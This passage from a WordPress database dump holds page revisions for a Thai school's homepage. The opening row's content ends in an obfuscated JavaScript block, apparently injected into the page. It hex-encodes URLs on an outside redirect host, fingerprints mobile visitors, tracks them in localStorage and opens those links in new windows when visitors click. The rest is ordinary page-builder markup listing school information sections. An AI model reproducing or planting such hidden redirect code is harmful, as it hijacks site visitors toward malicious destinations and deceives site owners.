f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:40:12','2024-07-27 04:40:12','',14,'http://pakhaeng.ssk.in.th/?p=100',0,'revision','',0),
(101,1,'2024-07-27 11:40:46','2024-07-27 04:40:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 